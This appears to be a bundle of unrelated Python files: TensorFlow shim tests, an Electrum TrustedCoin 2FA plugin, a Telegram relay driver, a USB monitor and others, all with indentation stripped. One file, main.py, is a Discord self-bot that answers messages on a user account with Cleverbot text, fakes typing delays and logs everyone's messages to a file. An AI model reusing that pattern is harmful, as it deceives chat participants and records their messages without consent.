def test_compat_v1_make_template_in_shim_tf_function(self):
# Test the shim when using `compat.v1.make_template`
# Verify it works correctly in a tf.function
# when made outside the function
layer = CompatV1TemplateScaleByY()
@tf.function
def foo(x):
return layer(x), tf.add_n(layer.losses)
for _ in range(3):
# Use multiple calls to verify that no new weights get created
out, loss = foo(tf.ones(shape=(2, 3)))
self.assertAllEqual(out, tf.constant(1.5, shape=(2, 3)))
self.assertAllEqual(loss, regularizers.L2()(layer.weights[0]))
self.assertAllEqual({var.name: var.numpy() for var in layer.weights},
{"foo/scale_by_y/y:0": 1.5})
def test_compat_v1_make_template_in_trace_in_shim(self):
# Test the shim when using `compat.v1.make_template`
# Verify it works correctly when the make_template/layer/shim
# is created on the first tf.function trace!
layers = {}
@tf.function
def bar(x):
if "layer" not in layers:
layers["layer"] = CompatV1TemplateScaleByY()
layer = layers["layer"]
return layer(x), tf.add_n(layer.losses)
for _ in range(3):
# Use multiple calls to verify that no new weights get created
out, loss = bar(tf.ones(shape=(2, 3)))
self.assertAllEqual(out, tf.constant(1.5, shape=(2, 3)))
self.assertAllEqual(loss, regularizers.L2()(layers["layer"].weights[0]))
self.assertAllEqual(
{var.name: var.numpy() for var in layers["layer"].weights},
{"foo/scale_by_y/y:0": 1.5})
def test_only_track_get_variable(self):
# Test the shim does not try tracking or reusing variables
# that were not created by get_variable. These variables/modules/layers
# need to be tracked separately
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, **kwargs):
super().__init__(**kwargs)
self.units = units
self._dense_model = None
def forward_pass(self, inputs):
dense_layer = core.Dense(
self.units, name="dense",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
return dense_layer(inputs)
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 5)
self.assertEmpty(layer.weights)
def test_embedded_keras_model(self):
# Test the shim when embedding a Keras model inside of it
# And assigning the model to an attribute
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, **kwargs):
super().__init__(**kwargs)
self.units = units
self._dense_model = None
def forward_pass(self, inputs):
if not self._dense_model:
inp = input_layer_module.Input(shape=inputs.shape)
dense_layer = core.Dense(
self.units, name="dense",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
self._dense_model = training_module.Model(
inputs=inp, outputs=dense_layer(inp))
return self._dense_model(inputs)
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
self.assertEqual(weights.keys(), {"dense/bias:0",
"dense/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 5)
self.assertAllEqual(tf.add_n(layer.losses), 0.5)
# Verify reuse by updating the variables then re-running
weights["dense/kernel:0"].assign(
tf.ones(shape=(5, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 10)
self.assertAllEqual(tf.add_n(layer.losses), 2)
def test_embedded_keras_model_in_module(self):
# Test the module shim when embedding a Keras model inside of it
# And assigning the model to an attribute
class WrappedDenseLayer(VariableScopeModule):
def __init__(self, units, **kwargs):
super().__init__(**kwargs)
self.units = units
self._dense_model = None
def forward_pass(self, inputs):
if not self._dense_model:
inp = input_layer_module.Input(shape=inputs.shape)
dense_layer = core.Dense(
self.units, name="dense",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
self._dense_model = training_module.Model(
inputs=inp, outputs=dense_layer(inp))
return self._dense_model(inputs)
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
self.assertEqual(weights.keys(), {"dense/bias:0",
"dense/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 5)
# The module shim will only track regularization losses made by
# compat.v1.layers and compat.v1.get_variable. Other regularization
# losses must be tracked by separate user-created mechanisms.
self.assertEmpty(layer.get_compat_v1_regularization_losses())
# Verify reuse by updating the variables then re-running
weights["dense/kernel:0"].assign(
tf.ones(shape=(5, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 10)
# The module shim will only track regularization losses made by
# compat.v1.layers and compat.v1.get_variable. Other regularization
# losses must be tracked by separate user-created mechanisms.
self.assertEmpty(layer.get_compat_v1_regularization_losses())
def test_training_arg(self):
# Test the shim when passing in a Keras `training` arg
class TrainingCheckLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
if training:
out = core_layers.dense(inputs, self.units, name="dense_training")
else:
out = core_layers.dense(inputs, self.units, name="dense_no_training")
return out
layer = TrainingCheckLayer(10)
layer(tf.ones(shape=(5, 5)), training=True)
weights = {x.name: x for x in layer.variables}
# Verify the correct variables were made
self.assertEqual(weights.keys(),
{"dense_training/bias:0", "dense_training/kernel:0"})
layer = TrainingCheckLayer(10)
layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct variables were made
self.assertEqual(weights.keys(),
{"dense_no_training/bias:0", "dense_no_training/kernel:0"})
def test_incorrect_decoration(self):
# Raise an error if you incorrectly decorate a method
# that is not a method of a Module, layer, or model:
@variable_scope_shim.track_tf1_style_variables
def foo(x):
return x * 2
with self.assertRaisesRegex(ValueError, "does not extend"):
foo(tf.ones(shape=(4, 4)))
if __name__ == "__main__":
tf.test.main()
|
main.py | import cleverbotfree.cbfree
import sys
import discord
import asyncio
import json
import random, time, threading
from discord.ext.tasks import loop
bot = discord.Client(description="xddd", self_bot=True)
gs={"a":"text"}
writer=""
olw=""
token = ""
print("Creating handler...")
gs["rs"]=cleverbotfree.cbfree.Cleverbot()
gs["rs"].browser.get(gs["rs"].url)
gs["rs"].get_form()
print("Loading discord api...")
illegal_character = [':','<','>','_',"'","-"]
@bot.event
async def on_ready():
print("Logged in")
@bot.event
async def on_message(message):
print("called")
if message.author == bot.user:
return
global illegal_character, gs, writer
if message.guild:
if not message.guild in gs:
gs[message.guild]=gs.pop("rs")
userInput = (message.content)
for z in illegal_character:
userInput="".join(userInput.split(z))
print(userInput)
if userInput in illegal_character:
print(f"{message.author} has said an illegal character")
x = random.uniform(0.4, 1.5)
print("typing...")
await asyncio.sleep(x)
async with message.channel.typing():
gs[message.guild].send_input(userInput)
b = gs[message.guild].get_response()
await message.channel.send(b)
print(str(message.guild)+":"+message.content)
print("bot:" + b)
writer=writer+"\n"+(str(message.guild)+"("+str(message.author)+"):"+message.content)
writer=writer+"\n"+("bot:" + b)
elif not message.guild:
if not message.author in gs:
gs[message.author]=gs.pop("rs")
userInput = (message.content)
for z in illegal_character:
userInput="".join(userInput.split(z))
print(userInput)
if userInput in illegal_character:
print(f"{message.author} has said an illegal character")
x = random.uniform(0.4, 1.5)
print("typing...")
await asyncio.sleep(x)
async with message.channel.typing():
gs[message.author].send_input(userInput)
b = gs[message.author].get_response()
await message.channel.send(b)
print(str(message.author)+":"+message.content)
print("bot:" + b)
writer=writer+"\n"+(str(message.author)+":"+message.content)
writer=writer+"\n"+("bot:" + b)
def ns():
global gs
while True:
if not "rs" in gs:
print("making new...")
gs["rs"]=cleverbotfree.cbfree.Cleverbot()
gs["rs"].browser.get(gs["rs"].url)
gs["rs"].get_form()
print("made new")
time.sleep(2)
nss=threading.Thread(target=ns)
nss.start()
@loop(seconds=2)
async def wri():
global olw,writer
if writer!=olw:
print("log updated")
olw=writer
f=open("text.log","w")
f.write(olw)
f.close()
wri.start()
bot.run(token, bot=False)
|
usb_monitor.py | import usb.core
import usb.util
import time
import re
import threading
import logging
log = logging.getLogger(__name__)
class UsbDescriptor:
def __init__(self, device_id, bus, address, device):
self.device_id = device_id
self.bus = bus
self.address = address
self.device = device
def __eq__(self, other):
if self.device_id == other.device_id and self.bus == other.bus and self.address == other.address:
return True
else:
return False
class UsbMonitor:
POLLING_INTERVAL_IN_SEC = 1
regex = r"DEVICE ID ([a-f0-9]*:[a-f0-9]*) on Bus ([0-9][0-9][0-9]) Address ([0-9][0-9][0-9]) [=]*"
def __init__(self, white_list_device_ids=list()):
self.reported_devices = list()
self.usb_device_found_cb_list = list()
self.usb_device_lost_cb_list = list()
self.request_terminate = False
self.white_list_device_ids = white_list_device_ids
self.monitor_thread = None
@staticmethod
def device_to_usb_descriptor(device):
matches = re.finditer(UsbMonitor.regex, str(device), re.MULTILINE)
for matchNum, match in enumerate(matches, start=1):
if len(match.groups()) != 3:
print('Unexpected group size while looking for USB data (3 expected): ' +
str(len(match.groups())))
continue
_ = match.group(0)
device_id = match.group(1)
bus = match.group(2)
address = match.group(3)
return UsbDescriptor(device_id, bus, address, device)
return None
def monitor(self):
log.info('Looking for connected USB devices: ' + str(self.white_list_device_ids))
while not self.request_terminate:
connected_devices = list()
for dev in usb.core.find(find_all=True):
usb_descriptor = self.device_to_usb_descriptor(dev)
if usb_descriptor is not None:
connected_devices.append(usb_descriptor)
# look for new devices
for dev in connected_devices:
if dev not in self.reported_devices:
if dev.device_id in self.white_list_device_ids:
for cb in self.usb_device_found_cb_list:
cb(dev)
# look for lost devices
for dev in self.reported_devices:
if dev not in connected_devices:
if dev.device_id in self.white_list_device_ids:
for cb in self.usb_device_lost_cb_list:
cb(dev)
self.reported_devices = connected_devices
time.sleep(self.POLLING_INTERVAL_IN_SEC)
def start(self):
self.monitor_thread = threading.Thread(target=self.monitor, args=())
self.monitor_thread.start()
def register_device_found_cb(self, cb):
self.usb_device_found_cb_list.append(cb)
def register_device_lost_cb(self, cb):
self.usb_device_lost_cb_list.append(cb)
|
qt.py | #!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from functools import partial
import threading
from threading import Thread
import re
from decimal import Decimal
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from electrum_gui.qt.util import *
from electrum_gui.qt.qrcodewidget import QRCodeWidget
from electrum_gui.qt.amountedit import AmountEdit
from electrum_gui.qt.main_window import StatusBarButton
from electrum.i18n import _
from electrum.plugins import hook
from electrum.util import PrintError, is_valid_email
from .trustedcoin import TrustedCoinPlugin, server
class TOS(QTextEdit):
tos_signal = pyqtSignal()
error_signal = pyqtSignal(object)
class HandlerTwoFactor(QObject, PrintError):
def __init__(self, plugin, window):
super().__init__()
self.plugin = plugin
self.window = window
def prompt_user_for_otp(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.plugin.wallet_class):
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].get_tx_derivations(tx):
self.print_error("twofactor: xpub3 not needed")
return
window = self.window.top_level_window()
auth_code = self.plugin.auth_dialog(window)
try:
wallet.on_otp(tx, auth_code)
except:
on_failure(sys.exc_info())
return
on_success(tx)
class Plugin(TrustedCoinPlugin):
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
@hook
def on_new_window(self, window):
wallet = window.wallet
if not isinstance(wallet, self.wallet_class):
return
wallet.handler_2fa = HandlerTwoFactor(self, window)
if wallet.can_sign_without_server():
msg = ' '.join([
_('This wallet was restored from seed, and it contains two master private keys.'),
_('Therefore, two-factor authentication is disabled.')
])
action = lambda: window.show_message(msg)
else:
action = partial(self.settings_dialog, window)
button = StatusBarButton(QIcon(":icons/trustedcoin-status.png"),
_("TrustedCoin"), action)
window.statusBar().addPermanentWidget(button)
self.start_request_thread(window.wallet)
def auth_dialog(self, window):
d = WindowModalDialog(window, _("Authorization"))
vbox = QVBoxLayout(d)
pw = AmountEdit(None, is_int = True)
msg = _('Please enter your Google Authenticator code')
vbox.addWidget(QLabel(msg))
grid = QGridLayout()
grid.setSpacing(8)
grid.addWidget(QLabel(_('Code')), 1, 0)
grid.addWidget(pw, 1, 1)
vbox.addLayout(grid)
msg = _('If you have lost your second factor, you need to restore your wallet from seed in order to request a new code.')
label = QLabel(msg)
label.setWordWrap(1)
vbox.addWidget(label)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
return pw.get_amount()
def prompt_user_for_otp(self, wallet, tx, on_success, on_failure):
wallet.handler_2fa.prompt_user_for_otp(wallet, tx, on_success, on_failure)
def waiting_dialog(self, window, on_finished=None):
task = partial(self.request_billing_info, window.wallet)
return WaitingDialog(window, 'Getting billing information...', task,
on_finished)
@hook
def abort_send(self, window):
wallet = window.wallet
if not isinstance(wallet, self.wallet_class):
return
if wallet.can_sign_without_server():
return
if wallet.billing_info is None:
self.start_request_thread(wallet)
window.show_error(_('Requesting account info from TrustedCoin server...') + '\n' +
_('Please try again.'))
return True
return False
def settings_dialog(self, window):
self.waiting_dialog(window, partial(self.show_settings_dialog, window))
def show_settings_dialog(self, window, success):
if not success:
window.show_message(_('Server not reachable.'))
return
wallet = window.wallet
d = WindowModalDialog(window, _("TrustedCoin Information"))
d.setMinimumSize(500, 200)
vbox = QVBoxLayout(d)
hbox = QHBoxLayout()
logo = QLabel()
logo.setPixmap(QPixmap(":icons/trustedcoin-status.png"))
msg = _('This wallet is protected by TrustedCoin\'s two-factor authentication.') + '<br/>'\
+ _("For more information, visit") + " <a href=\"https://api.trustedcoin.com/#/electrum-help\">https://api.trustedcoin.com/#/electrum-help</a>"
label = QLabel(msg)
label.setOpenExternalLinks(1)
hbox.addStretch(10)
hbox.addWidget(logo)
hbox.addStretch(10)
hbox.addWidget(label)
hbox.addStretch(10)
vbox.addLayout(hbox)
vbox.addStretch(10)
msg = _('TrustedCoin charges a small fee to co-sign transactions. The fee depends on how many prepaid transactions you buy. An extra output is added to your transaction every time you run out of prepaid transactions.') + '<br/>'
label = QLabel(msg)
label.setWordWrap(1)
vbox.addWidget(label)
vbox.addStretch(10)
grid = QGridLayout()
vbox.addLayout(grid)
price_per_tx = wallet.price_per_tx
n_prepay = wallet.num_prepay(self.config)
i = 0
for k, v in sorted(price_per_tx.items()):
if k == 1:
continue
grid.addWidget(QLabel("Pay every %d transactions:"%k), i, 0)
grid.addWidget(QLabel(window.format_amount(v/k) + ' ' + window.base_unit() + "/tx"), i, 1)
b = QRadioButton()
b.setChecked(k == n_prepay)
b.clicked.connect(lambda b, k=k: self.config.set_key('trustedcoin_prepay', k, True))
grid.addWidget(b, i, 2)
i += 1
n = wallet.billing_info.get('tx_remaining', 0)
grid.addWidget(QLabel(_("Your wallet has {} prepaid transactions.").format(n)), i, 0)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def on_buy(self, window, k, v, d):
d.close()
if window.pluginsdialog:
window.pluginsdialog.close()
wallet = window.wallet
uri = "bitcoin:" + wallet.billing_info['billing_address'] + "?message=TrustedCoin %d Prepaid Transactions&amount="%k + str(Decimal(v)/100000000)
wallet.is_billing = True
window.pay_to_URI(uri)
window.payto_e.setFrozen(True)
window.message_e.setFrozen(True)
window.amount_e.setFrozen(True)
def go_online_dialog(self, wizard):
msg = [
_("Your wallet file is: {}.").format(os.path.abspath(wizard.storage.path)),
_("You need to be online in order to complete the creation of "
"your wallet. If you generated your seed on an offline "
'computer, click on "{}" to close this window, move your '
"wallet file to an online computer, and reopen it with "
"Electrum.").format(_('Cancel')),
_('If you are online, click on "{}" to continue.').format(_('Next'))
]
msg = '\n\n'.join(msg)
wizard.stack = []
wizard.confirm_dialog(title='', message=msg, run_next = lambda x: wizard.run('accept_terms_of_use'))
def accept_terms_of_use(self, window):
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Terms of Service")))
tos_e = TOS()
tos_e.setReadOnly(True)
vbox.addWidget(tos_e)
tos_received = False
vbox.addWidget(QLabel(_("Please enter your e-mail address")))
email_e = QLineEdit()
vbox.addWidget(email_e)
next_button = window.next_button
prior_button_text = next_button.text()
next_button.setText(_('Accept'))
def request_TOS():
try:
tos = server.get_terms_of_service()
except Exception as e:
import traceback
traceback.print_exc(file=sys.stderr)
tos_e.error_signal.emit(_('Could not retrieve Terms of Service:')
+ '\n' + str(e))
return
self.TOS = tos
tos_e.tos_signal.emit()
def on_result():
tos_e.setText(self.TOS)
nonlocal tos_received
tos_received = True
set_enabled()
def on_error(msg):
window.show_error(str(msg))
window.terminate()
def set_enabled():
next_button.setEnabled(tos_received and is_valid_email(email_e.text()))
tos_e.tos_signal.connect(on_result)
tos_e.error_signal.connect(on_error)
t = Thread(target=request_TOS)
t.setDaemon(True)
t.start()
email_e.textChanged.connect(set_enabled)
email_e.setFocus(True)
window.exec_layout(vbox, next_enabled=False)
next_button.setText(prior_button_text)
email = str(email_e.text())
self.create_remote_key(email, window)
def request_otp_dialog(self, window, short_id, otp_secret, xpub3):
vbox = QVBoxLayout()
if otp_secret is not None:
uri = "otpauth://totp/%s?secret=%s"%('trustedcoin.com', otp_secret)
l = QLabel("Please scan the following QR code in Google Authenticator. You may as well use the following key: %s"%otp_secret)
l.setWordWrap(True)
vbox.addWidget(l)
qrw = QRCodeWidget(uri)
vbox.addWidget(qrw, 1)
msg = _('Then, enter your Google Authenticator code:')
else:
label = QLabel(
"This wallet is already registered with TrustedCoin. "
"To finalize wallet creation, please enter your Google Authenticator Code. "
)
label.setWordWrap(1)
vbox.addWidget(label)
msg = _('Google Authenticator code:')
hbox = QHBoxLayout()
hbox.addWidget(WWLabel(msg))
pw = AmountEdit(None, is_int = True)
pw.setFocus(True)
pw.setMaximumWidth(50)
hbox.addWidget(pw)
vbox.addLayout(hbox)
cb_lost = QCheckBox(_("I have lost my Google Authenticator account"))
cb_lost.setToolTip(_("Check this box to request a new secret. You will need to retype your seed."))
vbox.addWidget(cb_lost)
cb_lost.setVisible(otp_secret is None)
def set_enabled():
b = True if cb_lost.isChecked() else len(pw.text()) == 6
window.next_button.setEnabled(b)
pw.textChanged.connect(set_enabled)
cb_lost.toggled.connect(set_enabled)
window.exec_layout(vbox, next_enabled=False, raise_on_cancel=False)
self.check_otp(window, short_id, otp_secret, xpub3, pw.get_amount(), cb_lost.isChecked())
|
driver.py | import threading
import asyncio
from typing import Dict, Union, List, Optional
from typing_extensions import Literal
from aiogram import Bot, Dispatcher, executor, types
from aiogram.types import ContentType
from unified_message_relay.Core.UMRType import UnifiedMessage, MessageEntity, ChatAttribute, ChatType, EntityType
from unified_message_relay.Core import UMRDriver
from unified_message_relay.Core import UMRLogging
from unified_message_relay.Core import UMRConfig
from unified_message_relay.Core.UMRMessageRelation import set_ingress_message_id, set_egress_message_id
from unified_message_relay.Util.Helper import unparse_entities_to_html
class TelegramDriverConfig(UMRConfig.BaseDriverConfig):
Base: Literal['Telegram']
BotToken: str
HTTPProxy: Optional[str]
UMRConfig.register_driver_config(TelegramDriverConfig)
class TelegramDriver(UMRDriver.BaseDriverMixin):
def __init__(self, name):
super().__init__(name)
self.name = name
# Initialize bot and dispatcher
self.logger = UMRLogging.get_logger(f'UMRDriver.{self.name}')
self.logger.debug(f'Started initialization for {self.name}')
self.config: TelegramDriverConfig = UMRConfig.config.Driver[self.name]
self.bot_user_id = int(self.config.BotToken.split(':')[0])
self.image_file_id: Dict[str, str] = dict() # mapping from filename to existing file id
self.loop = asyncio.new_event_loop()
self.loop.set_exception_handler(self.handle_exception)
self.bot = Bot(token=self.config.BotToken, loop=self.loop, proxy=self.config.HTTPProxy)
self.dp = Dispatcher(self.bot)
def start(self):
def run():
nonlocal self
self.logger.debug('Running start')
asyncio.set_event_loop(self.loop)
@self.dp.message_handler(content_types=ContentType.ANY)
@self.dp.edited_message_handler(content_types=ContentType.ANY)
async def handle_msg(message: types.Message):
from_user = message.from_user
_chat_type = ChatType.GROUP if message.chat.id < 0 else ChatType.PRIVATE
if message.text:
text = message.text
elif message.caption:
text = message.caption
else:
text = ''
message_entities = self.parse_entities(message)
unified_message = UnifiedMessage(platform=self.name,
text=text,
message_entities=message_entities,
chat_id=message.chat.id,
chat_type=_chat_type,
name=from_user.full_name,
user_id=from_user.id,
message_id=message.message_id)
self.get_chat_attributes(message, unified_message.chat_attrs)
set_ingress_message_id(src_platform=self.name, src_chat_id=message.chat.id, src_chat_type=_chat_type,
src_message_id=message.message_id, user_id=message.from_user.id)
if message.content_type == ContentType.TEXT:
pass
elif message.content_type == ContentType.PHOTO:
url, file_id = await self.tg_get_image(message.photo[-1].file_id)
unified_message.image = url
unified_message.file_id = file_id
elif message.content_type == ContentType.STICKER:
url, file_id = await self.tg_get_image(message.sticker.file_id)
unified_message.image = url
unified_message.file_id = file_id
elif message.content_type == ContentType.ANIMATION:
url, file_id = await self.tg_get_image(message.animation.file_id)
unified_message.image = url
unified_message.file_id = file_id
else:
unified_message.text = '[Unsupported message]'
await self.receive(unified_message)
executor.start_polling(self.dp, skip_updates=True, loop=self.loop)
t = threading.Thread(target=run)
t.daemon = True
UMRDriver.threads.append(t)
t.start()
self.logger.debug(f'Finished initialization')
async def send(self, to_chat: Union[int, str], chat_type: ChatType, message: UnifiedMessage):
"""
decorator for send new message
:return:
"""
self.logger.debug('calling real send')
return asyncio.run_coroutine_threadsafe(self._send(to_chat, message), self.loop)
async def _send(self, to_chat: int, message: UnifiedMessage):
"""
decorator for send new message
:return:
"""
self.logger.debug('begin processing message')
await self.bot.send_chat_action(to_chat, types.chat.ChatActions.TYPING)
if message.chat_attrs.name:
text = '<b>' + message.chat_attrs.name + '</b>: '
else:
text = ''
text += unparse_entities_to_html(message,
EntityType.LINK | EntityType.STRIKETHROUGH | EntityType.UNDERLINE |
EntityType.CODE_BLOCK | EntityType.BOLD | EntityType.ITALIC |
EntityType.PLAIN | EntityType.CODE)
if message.send_action.message_id:
reply_to_message_id = message.send_action.message_id
else:
reply_to_message_id = None # TODO support cross platform reply in the future
if message.image:
if message.image in self.image_file_id:
self.logger.debug(f'file id for {message.image} found, sending file id')
if message.image.endswith('gif'):
tg_message = await self.bot.send_animation(to_chat, self.image_file_id[message.image], caption=text,
parse_mode=types.message.ParseMode.HTML,
reply_to_message_id=reply_to_message_id)
else:
tg_message = await self.bot.send_photo(to_chat, self.image_file_id[message.image], caption=text,
parse_mode=types.message.ParseMode.HTML,
reply_to_message_id=reply_to_message_id)
else:
self.logger.debug(f'file id for {message.image} not found, sending image file')
if message.image.endswith('gif'):
tg_message = await self.bot.send_animation(to_chat, types.input_file.InputFile(message.image),
caption=text,
parse_mode=types.message.ParseMode.HTML,
reply_to_message_id=reply_to_message_id)
self.image_file_id[message.image] = tg_message.document.file_id
else:
tg_message = await self.bot.send_photo(to_chat, types.input_file.InputFile(message.image),
caption=text,
parse_mode=types.message.ParseMode.HTML,
reply_to_message_id=reply_to_message_id)
self.image_file_id[message.image] = tg_message.photo[-1].file_id
else:
self.logger.debug('finished processing message, ready to send')
tg_message = await self.bot.send_message(to_chat, text, parse_mode=types.message.ParseMode.HTML,
reply_to_message_id=reply_to_message_id)
if message.chat_attrs:
set_egress_message_id(src_platform=message.chat_attrs.platform,
src_chat_id=message.chat_attrs.chat_id,
src_chat_type=message.chat_attrs.chat_type,
src_message_id=message.chat_attrs.message_id,
dst_platform=self.name,
dst_chat_id=to_chat,
dst_chat_type=ChatType.GROUP if to_chat < 0 else ChatType.PRIVATE,
dst_message_id=tg_message.message_id,
user_id=self.bot_user_id)
self.logger.debug('finished sending')
return tg_message.message_id
def parse_entities(self, message: types.Message):
if message.entities:
entities = message.entities
elif message.caption_entities:
entities = message.caption_entities
else:
return None
result = list()
for entity in entities:
entity_map = {
'mention': EntityType.BOLD,
'hashtag': EntityType.PLAIN,
'cashtag': EntityType.PLAIN,
'bot_command': EntityType.PLAIN,
'url': EntityType.PLAIN,
'email': EntityType.PLAIN,
'phone_number': EntityType.PLAIN,
'bold': EntityType.BOLD,
'italic': EntityType.ITALIC,
'underline': EntityType.UNDERLINE,
'strikethrough': EntityType.STRIKETHROUGH,
'code': EntityType.CODE,
'pre': EntityType.CODE_BLOCK,
'text_mention': EntityType.BOLD,
'text_link': EntityType.LINK
}
if entity.type == 'text_link':
url = entity.url
else:
url = ''
result.append(MessageEntity(start=entity.offset, end=entity.offset + entity.length,
entity_type=entity_map[entity.type], link=url))
return result
async def tg_get_image(self, file_id) -> (str, str):
"""
:param file_id:
:return:
"""
file: types.File = await self.bot.get_file(file_id)
url = f'https://api.telegram.org/file/bot{self.config.BotToken}/{file.file_path}'
perm_id = file.file_unique_id
return url, perm_id
def get_chat_attributes(self, message: types.Message, chat_attrs: ChatAttribute):
if message.forward_from_chat: # forward from channel or user's private chat
if message.forward_from_chat.title:
name = message.forward_from_chat.title
chat_id = message.forward_from_chat.id
user_id = 0
message_id = message.forward_from_message_id
else:
name = message.forward_from_chat.full_name
chat_id = message.forward_from_chat.id
user_id = message.forward_from_chat.id
message_id = 0
# private message does not have message_id, and channel message does not have user_id
chat_attrs.forward_from = ChatAttribute(platform=self.name,
chat_id=chat_id,
chat_type=ChatType.GROUP if message.chat.id < 0 else ChatType.PRIVATE,
user_id=user_id,
name=name,
message_id=message_id)
if message.forward_sender_name:
chat_attrs.forward_from = ChatAttribute(platform=self.name,
name=message.forward_sender_name)
if message.forward_from: # forward from user (group message)
name = message.forward_from.full_name
user_id = message.forward_from.id
# forward message does not have message_id and chat_id
chat_attrs.forward_from = ChatAttribute(platform=self.name,
chat_type=ChatType.PRIVATE,
chat_id=0,
user_id=user_id,
name=name)
if message.reply_to_message:
chat_attrs.reply_to = ChatAttribute(platform=self.name,
chat_id=message.reply_to_message.chat.id,
chat_type=ChatType.GROUP if message.reply_to_message.chat.id < 0 else ChatType.PRIVATE,
name=message.reply_to_message.from_user.full_name,
user_id=message.reply_to_message.from_user.id,
message_id=message.reply_to_message.message_id)
self.get_chat_attributes(message.reply_to_message, chat_attrs.reply_to)
async def is_group_admin(self, chat_id: int, chat_type: ChatType, user_id: int):
if chat_type != ChatType.GROUP:
return False
member = await self.bot.get_chat_member(chat_id, user_id)
if member:
if member.status in ('creator', 'administrator'):
return True
return False
async def is_group_owner(self, chat_id: int, chat_type: ChatType, user_id: int):
if chat_type != ChatType.GROUP:
return False
member = await self.bot.get_chat_member(chat_id, user_id)
if member:
if member.status == 'creator':
return True
return False
def handle_exception(self, loop, context):
# context["message"] will always be there; but context["exception"] may not
msg = context.get("exception", context["message"])
self.logger.exception('Unhandled exception: ', exc_info=msg)
UMRDriver.register_driver('Telegram', TelegramDriver)
|
boringproxy_local_client.py | #!/usr/bin/env python3
import logging
import os
import subprocess
import threading
logger = logging.getLogger(__name__)
class BoringproxyLocalClient:
BINARY_NAME = "boringproxy"
def __init__(self, server_host, token, client_name, binary_path=None):
self.server_host = server_host
self.token = token
self.client_name = client_name
self.binary_finder = BinaryFileFinder(self.BINARY_NAME)
self.binary_path = binary_path if binary_path else self.binary_finder.get_binary_path()
self.process = None
self.output_checker_thread = None
def start(self):
logger.debug(f"Starting '{self.client_name}' boringproxy local client")
if not self.binary_path:
logger.error(
"Binary file for boringproxy local client could not be found")
return
command = [self.binary_path, "client", "-server", self.server_host,
"-token", self.token, "-client-name", self.client_name]
self.process = subprocess.Popen(
command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
self.output_checker_thread = threading.Thread(
target=self.__output_checker)
self.output_checker_thread.start()
def stop(self):
logger.debug(f"Stopping '{self.client_name}' boringproxy local client")
if self.process:
self.process.terminate()
def restart(self):
logger.debug(
f"Restarting '{self.client_name}' boringproxy local client")
self.stop()
self.start()
def __output_checker(self):
line = ''
while self.process.returncode is None:
character = self.process.stdout.read(1).decode("utf-8")
line += character
if character == '\n':
logger.debug(line)
line = ''
if "Email address: " in line:
logger.info(
"Email input detected, sending new line character to access the license")
self.process.stdin.write(b'\n')
self.process.stdin.flush()
break
self.process.poll()
logger.debug("Output checker has finished")
class BinaryFileFinder:
BINARY_FOLDERS = [
"/usr/bin",
"/usr/sbin",
"/usr/local/bin",
"/usr/local/sbin"
]
def __init__(self, binary_name):
self.binary_name = binary_name
def get_binary_path(self):
for folder in self.BINARY_FOLDERS:
possible_path = f"{folder}/{self.binary_name}"
if os.path.isfile(possible_path):
return possible_path
|
wxRaven_JSON_Viewer_Logic.py | '''
Created on 6 mars 2022
@author: slinux
'''
from wxRavenGUI.application.wxcustom import *
from .wxRavenShellDesign import wxRaven_General_JSONViewer
import threading
import time
import sys,math
import json
import requests
import libs.pyperclip
import ast
class wxRaven_JSON_ViewerLogic(wxRaven_General_JSONViewer):
'''
classdocs
'''
view_base_name = "JSON Viewer"
view_name = "JSON Viewer"
parent_frame = None
default_position = "main"
icon = 'json_file_icon'#wx.Bitmap( u"res/default_style/normal/help_view.png", wx.BITMAP_TYPE_ANY )
def __init__(self, parentFrame, position = "main", viewName= "JSON Viewer", isInternalPluginView=False):
'''
Constructor
'''
